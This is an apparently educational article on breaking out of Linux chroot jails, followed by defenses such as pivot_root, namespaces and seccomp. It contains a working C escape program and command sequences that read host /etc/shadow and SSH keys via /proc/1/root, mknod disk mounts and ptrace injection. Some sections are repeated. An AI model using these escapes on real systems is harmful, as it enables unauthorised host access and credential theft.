Escaping a chroot Jail

For decades people have reached for chroot when they wanted to “lock a process into a directory.” It does change what the process sees as / — and almost nothing else. It doesn’t move your working directory, doesn’t close your open handles, and doesn’t take away root. A privileged process can simply climb back out, and the kernel manual literally tells you how.

For decades people have reached for chroot when they wanted to “lock a process into a directory.” It does change what the process sees as / — and almost nothing else. It doesn’t move your working directory, doesn’t close your open handles, and doesn’t take away root. A privileged process can simply climb back out, and the kernel manual literally tells you how.

11 min read Defensive education Real PoC + man(2)

There is a sentence in man 2 chroot that should end the “chroot is a sandbox” argument forever: “the superuser can escape from a chroot jail by doing: mkdir foo; chroot foo; cd ...” That is not a hypothetical from a security researcher — it is the documented behaviour of the system call, written by the people who maintain it. chroot() was built in 1979 to give a process a private view of the filesystem for builds and testing. It was never an isolation boundary, and everything below follows from that one design fact. This is a defensive walk-through for people running confined services and CTF/lab learners: understand the escape so you stop trusting the wrong primitive, then confine processes the way that actually holds.

What chroot actually does — and the myth

The chroot(path) system call does exactly one thing: it changes the value the kernel uses as the apparent root for the calling process. From the man page: “chroot() changes the root directory of the calling process to that specified in path. This directory will be used for pathnames beginning with /.” After the call, an absolute path like /etc/passwd is resolved relative to the new root, so the process can no longer name files above it by an absolute path. That is the whole feature.

The myth is that this is the same as confinement. It isn’t, because of three things chroot() deliberately does not do, each one stated plainly in man 2 chroot:

It does not change your current working directory. The manual: “This call does not change the current working directory, so that after the call . can be outside the tree rooted at /.” Read that twice. Your cwd can be outside your own root. That is the entire escape.

It does not close open file descriptors. “This call does not close open file descriptors, and such file descriptors may allow access to files outside the chroot tree.” A handle you opened before the jail still points where it always did.

It does not drop privileges. chroot() requires CAP_SYS_CHROOT to call — and leaves every capability you had intact afterwards, including CAP_SYS_CHROOT itself. So the process can just call chroot() again. Nothing about being “in a jail” weakens the prisoner.

The three things that make escape possible

An escape isn’t magic and it isn’t a kernel bug. It is the logical consequence of combining the three non-guarantees above. Boil it down and there are exactly three preconditions:

1. You are root inside the jail (or hold CAP_SYS_CHROOT). Calling chroot() a second time — the move that powers the classic break-out — requires that capability. A normal unprivileged user inside the jail cannot call chroot() at all, which is exactly why the answer to confinement is not running services as root.

2. Your working directory or a file descriptor sits above the new root. Because chroot() leaves cwd and open FDs untouched, a process that chroots without first doing chdir("/") is standing on a foothold outside its own cell. . and .. still walk the real tree.

3. There is no second confinement layer. No mount namespace, no seccomp, no dropped capabilities, no pivot_root. chroot is the only thing between the process and the host, so defeating chroot defeats everything.

The classic escape: a saved fd and chdir("..")

This is the canonical break-out, and it is short enough to read in full. The idea: before entering a fresh inner jail, save a handle to a directory that lives above it; then after chroot’ing, jump back to that handle and walk up .. until you hit the real /; finally chroot(".") to make that real root your root again. Here it is as a complete, working C program — every line is a real syscall, nothing is pseudocode:

break_chroot.c — the file-descriptor escape
#include 
#include 
#include 

int main(void) {
    int fd;

    mkdir(".out", 0755);     // 1. make a throwaway dir inside the current jail
    fd = open(".", O_RDONLY);  // 2. SAVE an fd to the current dir — this fd outlives chroot
    chroot(".out");          // 3. new root = .out, BUT cwd is NOT moved — cwd is now ABOVE root
    fchdir(fd);              // 4. jump cwd to the saved fd (the old dir, outside the new root)
    close(fd);

    // 5. cwd now sits outside the chroot tree, so ".." keeps climbing the REAL fs
    for (int i = 0; i < 1024; i++)
        chdir("..");          //    walk up until we hit the true root (".." at / is a no-op)

    chroot(".");             // 6. re-root onto the real / — the jail is gone
    return execl("/bin/sh", "-i", NULL);  // 7. shell with the whole host filesystem
}

Walk it line by line, because the “trick” is entirely in the ordering. After mkdir(".out") we open "." and keep the descriptor: that handle is bound to the directory object, not to a path, so it survives whatever happens to the namespace next. Then chroot(".out") sets the new root to the subdirectory — but, exactly as the manual promises, our cwd is not moved with it. We are now in the bizarre-but-legal state where cwd is outside /. fchdir(fd) drags the working directory back to that saved spot above the cell, and from there chdir("..") repeated 1024 times climbs to the real filesystem root (once you reach the true /, .. simply points at itself, so over-counting is harmless). The final chroot(".") pins root to where we’re now standing — the genuine host root — and execl drops a shell that can read /etc/shadow and everything else.

Compile and run it from inside a jail as root and you’re out:

build + run inside the jail (as root)
$ gcc -O2 -o break_chroot break_chroot.c
# ./break_chroot
# id; ls /            # real host root, not the jail
uid=0(root) gid=0(root)
bin  boot  dev  etc  home  root  sbin  ...   # escaped

There is an even shorter form for an interactive root shell that already has the tools. Because two chroots cannot nest the way you’d expect, simply chroot’ing into a fresh subdirectory and then walking up escapes — this is the literal man page example expressed as commands:

the man-page one-liner, in python
# python3 -c 'import os; os.mkdir("o"); os.chroot("o"); \
os.chdir("../../../../../../.."); os.chroot("."); os.system("/bin/sh")'
# mkdir o; chroot o  (cwd not moved) ; cd up to real / ; chroot "." ; shell

Other ways out: /proc, device nodes, and ptrace

The fd-walk is the textbook route, but a root process in a weak jail has several doors. They all rely on the same theme: chroot only filters absolute path lookups, so any primitive that reaches the host by another mechanism ignores the cell entirely.

A mounted /proc. This is the most common real-world slip. If procfs is mounted inside the jail, the kernel exposes /proc//root — a magic symlink to each process’s root directory. The init process, PID 1, is not chrooted, so its root is the real /. From inside the jail you simply read through it:

escape through a mounted procfs
# ls -la /proc/1/root/          # PID 1 isn't jailed — this is the host /
# cat /proc/1/root/etc/shadow   # read host files straight through the symlink
# chroot /proc/1/root /bin/sh   # or just re-root onto the host and get a shell

A device node and a raw mount. If the process keeps CAP_MKNOD (and CAP_SYS_ADMIN to mount), chroot does nothing to stop it touching block devices. You can fabricate a device node for the host’s disk with mknod, then mount that filesystem inside the jail and read the host’s files directly — bypassing path-based confinement completely, because you’re going at the bytes underneath:

mknod the host disk, then mount it
# mknod /dev/hax b 8 0          # recreate the host block device (e.g. /dev/sda, major 8 minor 0)
# mkdir /mnt-host
# mount /dev/hax /mnt-host      # mount the host root fs inside the jail
# ls /mnt-host                  # the whole host filesystem is now readable/writable

Ptrace an out-of-jail process. chroot does not create a PID namespace, so a jailed root process can still see — and, with CAP_SYS_PTRACE (or default same-uid rules), attach to — processes running outside the jail. Attach to a non-jailed process, inject shellcode or hijack its execution, and you are running with that process’s unrestricted root view. The jail boundary is a filesystem illusion; it does nothing at the process-table level.

The pattern across all three is the same: a real isolation boundary has to cover the process table, mounts, and capabilities, not just absolute path resolution. chroot covers only the last, and weakly.

When it WON’T work — being honest about prerequisites

None of this means chroot is trivially defeated in every setup. Be precise about the prerequisites, because they are also the defenses:

You need root / CAP_SYS_CHROOT for the classic escape. The fd-walk and the man-page one-liner both depend on a second chroot() call, and chroot() is privileged. An unprivileged process with no capabilities cannot call chroot() at all, so it cannot do the double-chroot trick. If your service runs as a normal user after being jailed, the headline escape is off the table.

The other routes need their own capabilities or mounts. No mounted procfs inside the jail → no /proc/1/root route. No CAP_MKNOD / CAP_SYS_ADMIN → no device-node-and-mount route. No CAP_SYS_PTRACE and no same-uid target outside → no ptrace route. Strip the capabilities and you close the doors one by one.

So the honest summary is: chroot run by root, or by anything holding CAP_SYS_CHROOT, is not a security boundary. chroot used as a view, by a process that has already dropped to a non-root uid with an empty capability set, is much harder to break out of — but at that point chroot is the least of the things protecting you, and you should be using a real sandbox anyway.

The fd escape, at the syscall level

The one-liner everyone copies — chroot() into a subdir, chdir() up a few hundred times, chroot(".") — works for a reason that is worth slowing down on, because the reason is the bug. Two facts about chroot(2) do all the damage. First: it never closes your open file descriptors. A fd you opened before the jail still points at the exact inode it always did, jail or no jail. Second, and this is the one the man page states almost in passing: chroot does not change the calling process's current working directory. So it is entirely possible — in fact it is the normal state right after the call — for your . to be sitting outside the tree rooted at the new /.

That dangling cwd is the whole game. The kernel resolves .. in follow_dotdot(), and the only thing stopping .. from climbing past the root is a check that asks "is the directory I'm standing on equal to this process's root?" If yes, .. is a no-op and you stay put. But if your cwd was never inside the new root to begin with, that equality never becomes true on the way up. You climb, and climb, and the kernel happily lets you, until you hit the real filesystem root and .. finally stops because there is nowhere higher to go. Now . is the true /. One more chroot(".") and the jail is the whole machine.

Here is the canonical proof-of-concept, annotated. This is the classic break-chroot.c shape (Jan Schaumann / countless mirrors) — nothing exotic, and that is the point.

break-chroot.c
/* you are already root INSIDE a chroot; CAP_SYS_CHROOT is required */
#include 
#include 
#include 

int main(void){
    /* 1. make a subdir so we can chroot DEEPER on purpose          */
    mkdir(".out", 0755);

    /* 2. open the CURRENT dir BEFORE we move root. this fd now     */
    /*    pins our position in the OLD tree — chroot won't close it */
    int fd = open(".", O_RDONLY);

    /* 3. chroot one level deeper. KEY: this moves our ROOT but    */
    /*    leaves cwd where it was — so cwd is now OUTSIDE root.     */
    chroot(".out");

    /* 4. land cwd back on the saved fd (outside the new root)     */
    fchdir(fd);

    /* 5. climb. follow_dotdot() never sees cwd == root, so ..     */
    /*    keeps walking up to the REAL filesystem root.            */
    for (int i = 0; i < 1024; i++) chdir("..");

    /* 6. cwd is now the true /. re-root onto it. jail gone.       */
    chroot(".");

    execl("/bin/sh", "-i", (char*)0);
    return 0;
}

Why 1024 and not a precise count? Because chdir("..") at the real root is just a no-op — climbing "too far" costs nothing, so you over-climb to be safe instead of computing your depth. Note also the asymmetry the PoC leans on: in step 3 the deeper chroot moves root but not cwd, and in step 6 we don't even need the fd anymore — by then plain chdir("..") has already walked us out. The fd in step 2 only matters if some wrapper chdir'd you into the jail first; fchdir simply restores the useful out-of-jail cwd. Strip the cwd-outside-root condition and the entire technique dies — which, as we'll see, is exactly what pivot_root does and chroot refuses to.

When the jail has too much: device and mount escapes

The fd trick needs nothing but a careless caller. The next class of escapes needs something stronger — capabilities the jail should never have handed you — but when they're present, you don't sneak out of the jail, you reach around it and read the host's disk directly. Root inside a chroot is still root; the chroot only narrows the pathname view, not what root is allowed to do with raw devices.

mknod a disk, then mount it

If you hold CAP_MKNOD, you can manufacture a device node for the host's root disk even though /dev inside the jail is empty. Create the block device with the right major:minor, then — if you also have CAP_SYS_ADMIN — mount it somewhere inside the jail and walk the host's real filesystem.

mknod + mount the host disk
# find the host's root block device (e.g. 8,2 for /dev/sda2)
# cat /proc/partitions          # readable even in many jails

# forge the block device inside the jail  (needs CAP_MKNOD)
# mknod /hostdisk b 8 2

# mount it — now the host root fs is visible at /mnt (needs CAP_SYS_ADMIN)
# mkdir /mnt && mount /hostdisk /mnt
# cat /mnt/etc/shadow            # host's real shadow, outside the jail

/dev/mem and the host's process roots

A jail that ships a populated /dev or a mounted /proc leaks even more. If /dev/mem exists in the jail and you have access to it, you can read (and on misconfigured systems write) physical RAM directly — root's view of memory ignores the pathname jail entirely. And if /proc is mounted, every host process advertises its real root at /proc//root. PID 1 lives outside any jail, so its root is the host root:

/proc and /dev/mem leaks
# if /proc is mounted in the jail: init's root is the HOST root
# ls -la /proc/1/root/           # the whole host filesystem
# cat /proc/1/root/etc/shadow

# a bind mount can also drag the outside world in (needs CAP_SYS_ADMIN)
# mkdir /esc && mount --bind / /esc   # "/" here is still the jail root,
                                     # but bind-mounting host paths from
                                     # a parent ns is the real-world variant

# raw physical memory, if the node is present and readable
# ls -l /dev/mem                 # major 1, minor 1 — read host RAM
Why these workThe chroot rewrites how pathnames are resolved. It does not revoke root's capabilities, and it does not stop the kernel from honouring a block-device node or a /proc//root symlink. A jail that grants CAP_MKNOD + CAP_SYS_ADMIN, ships device nodes, or mounts /proc, has handed you the keys without ever opening the cell.

ptrace: hijack a process that's already free

Every escape so far walks your process out. ptrace flips it: leave your process where it is, and seize control of a different process that was never jailed. If a process running outside the chroot shares your view enough to be attached — and you hold CAP_SYS_PTRACE (or it's your own uid and Yama's ptrace_scope allows it) — you can attach, rewrite its registers and memory, and make it execute your code. Its root is the host root, so the code you inject runs free.

attach an out-of-jail process
# the gate: 0 = attach any process you own, 1 = only descendants
# cat /proc/sys/kernel/yama/ptrace_scope

# attach to a victim PID that lives OUTSIDE the jail (CAP_SYS_PTRACE)
# gdb -p 
(gdb) # PTRACE_POKETEXT shellcode into its address space, set $pc, continue
(gdb) call (int) execl("/bin/sh", "/bin/sh", 0)

# equivalently, a PTRACE_ATTACH / POKETEXT / SETREGS / DETACH PoC in C:
#   ptrace(PTRACE_ATTACH, pid, 0, 0);  waitpid(pid,...);
#   ptrace(PTRACE_GETREGS, ...);  write shellcode w/ PTRACE_POKETEXT;
#   ptrace(PTRACE_SETREGS, ...);  ptrace(PTRACE_DETACH, pid, 0, 0);

The honest prerequisites matter here. Modern kernels ship kernel.yama.ptrace_scope=1, which forbids attaching to non-descendants unless you have CAP_SYS_PTRACE — so in a properly dropped jail this door is shut. It only opens when the jail kept ptrace capability or left ptrace_scope=0, and when there actually is a juicy un-jailed process to grab.

The real fix: pivot_root and mount namespaces

The reason chroot is escapable isn't a bug to be patched — it's the design. chroot moves one process's idea of / and touches nothing else: not your cwd, not your open fds, not anyone else's view, not the mount table. Containers don't "harden chroot"; they replace it with primitives that close every gap chroot leaves open. The headline swap is pivot_root inside a fresh mount namespace.

unshare(CLONE_NEWNS) gives the process a private copy of the mount table — changes here don't leak out, and (with private propagation) the host's mounts can be detached without affecting it. Then pivot_root(new_root, put_old) does what chroot won't: it swaps the root mount of the whole namespace, and crucially it rewrites the root and cwd of every process in that namespace that was pointing at the old root — so there's no leftover cwd hanging outside to climb back through. After the swap you unmount the old root entirely, and the path to the host is not merely forbidden, it's gone from the mount table.

the correct pivot_root sequence
# 1. private mount namespace so nothing propagates either way
# unshare --mount --propagation private bash

# 2. new_root MUST be a mount point — bind it onto itself
# mount --bind /srv/newroot /srv/newroot

# 3. a place to stash the old root, UNDER the new root
# mkdir -p /srv/newroot/old_root

# 4. swap: new_root becomes /, old root is parked at /old_root
# cd /srv/newroot
# pivot_root . old_root

# 5. fix up cwd + std mounts, then DETACH the old root for good
# cd /
# mount -t proc proc /proc
# umount -l /old_root            # MNT_DETACH — host fs no longer reachable

The equivalent in C is the sequence containers actually run: mount(NULL,"/",NULL,MS_REC|MS_PRIVATE,NULL), bind new_root onto itself, chdir(new_root), pivot_root(".",".") (the self-stacking variant), then umount2(".",MNT_DETACH). pivot_root demands CAP_SYS_ADMIN and refuses if the parent mounts are MS_SHARED — precisely so the swap can never propagate into another namespace. That, plus dropped capabilities, seccomp, and user namespaces, is why you can hand a container root and still keep it boxed: there is no cwd left outside, no fd to the host, and no mount to climb.

Gap chroot leavesWhat chroot doespivot_root + namespaces
cwd outside rootcwd untouched — can sit outsidecwd rewritten to new root
open fdskept open across the callold root unmounted; fds to it become dead ends
mount tableshared with hostprivate namespace; host mounts detached
raw devicesroot keeps CAP_MKNOD etc.caps dropped + devices not present

A full escape, start to finish

To make it concrete, here's how the pieces chain in a typical CTF / HTB-style "you have a shell in a chroot" box. Each step is just enumeration deciding which door is actually open.

enumerate → pick a door → escape
# 1. confirm you're jailed and learn who you are
$ ls -la /                       # suspiciously tiny root?
$ id ; cat /proc/self/status | grep Cap   # CapEff = which doors are open

# 2. are we root in the jail? decode the cap bitmap
$ capsh --decode=     # look for sys_chroot, mknod, sys_admin, sys_ptrace

# 3a. only CAP_SYS_CHROOT → classic fd escape
$ gcc -o /tmp/x break-chroot.c && /tmp/x      # shell at the real /

# 3b. CAP_MKNOD + CAP_SYS_ADMIN → mount the host disk
# grep -w / /proc/1/mountinfo     # find host root major:minor
# mknod /hd b 8 2 ; mount /hd /mnt ; chroot /mnt sh

# 3c. /proc mounted → no caps needed, just read init's root
$ cat /proc/1/root/root/.ssh/id_rsa   # loot, or chroot into it

# 4. land on the host, grab the flag / persist
# cat /root/root.txt

Doing confinement properly

If you genuinely need a directory view and you’re going to use chroot, at least use it the way that doesn’t hand attackers the escape — and understand it is only one thin layer.

Use chroot correctly (the minimum)Always chdir() into the new root before you run anything, so cwd is never left above it. Then drop privileges: setgroups()setgid()setuid() to a non-root account, and drop the capability set — critically CAP_SYS_CHROOT, CAP_MKNOD, CAP_SYS_ADMIN and CAP_SYS_PTRACE. The order matters: chroot() first (it needs the cap), chdir("/") into it, then drop. Don’t mount procfs inside the jail. With no capabilities and a non-root uid, the classic break-outs simply can’t be issued.
the safe sequence (C, simplified)
chroot("/var/jail");    // needs CAP_SYS_CHROOT — do it first
chdir("/");             // NOW cwd is inside the new root — no foothold left
setgroups(0, NULL);
setgid(65534);          // drop gid to "nobody"
setuid(65534);          // drop uid LAST — after this you can't chroot again
// now exec the confined program — it has no CAP_SYS_CHROOT to break out

But for real isolation, don’t lean on chroot at all — reach for the primitives the kernel actually designed for it:

Mount namespaces + pivot_root. This is what containers use. pivot_root swaps the entire root mount in a private mount namespace and then unmounts the old root, so there is no parent tree left to cd .. into — the foothold that powers the chroot escape is physically removed. unshare --mount --pid --net ... gives you that namespace boundary from the shell.

Namespaces for everything else. A PID namespace means the jailed process can’t even see host processes, killing the ptrace route. A user namespace lets you have “root” inside that maps to an unprivileged uid outside. A network namespace cuts it off the wire.

seccomp-bpf. Filter the syscalls the process is allowed to make at all — block chroot, mount, mknod, ptrace outright and the escapes have no syscall to call.

Or just use the finished tools. bwrap (bubblewrap), nsjail, firejail, systemd’s RootDirectory= + PrivateUsers= + NoNewPrivileges=, or a real container runtime stack all of these layers for you. That is the difference between a view and a sandbox.

Escape routes at a glance

Escape routeRequirementDefense
fd + chdir("..")root / CAP_SYS_CHROOT; cwd or fd above rootchdir("/") then drop uid + CAP_SYS_CHROOT
Double chrootroot / CAP_SYS_CHROOT (2nd chroot call)Drop CAP_SYS_CHROOT after entering
/proc/1/rootprocfs mounted in jailDon’t mount /proc; use PID namespace
mknod + mountCAP_MKNOD + CAP_SYS_ADMINDrop both caps; mount namespace
ptraceCAP_SYS_PTRACE / same-uid target outsidePID namespace; drop ptrace cap
(any of the above)chroot is the only layerpivot_root + namespaces + seccomp
The essencechroot() changes a process’s apparent / and nothing else — it doesn’t move your cwd, doesn’t close open file descriptors, and doesn’t drop privileges. So a root (or CAP_SYS_CHROOT) process saves an fd above the jail, chroots into a subdir, fchdirs back out, walks .. to the real root and re-chroots onto it — the escape is literally in man 2 chroot. A mounted /proc/1/root, an mknod’d disk, or ptrace of an out-of-jail process get out just as easily. An unprivileged process with no caps can’t do the classic trick, which is the whole point: never run jailed services as root. For real confinement, chdir in and drop uid + capabilities — or better, use mount/PID/user namespaces, pivot_root and seccomp (bubblewrap, nsjail, containers). chroot is a view, not a sandbox.
Reactions

Related Articles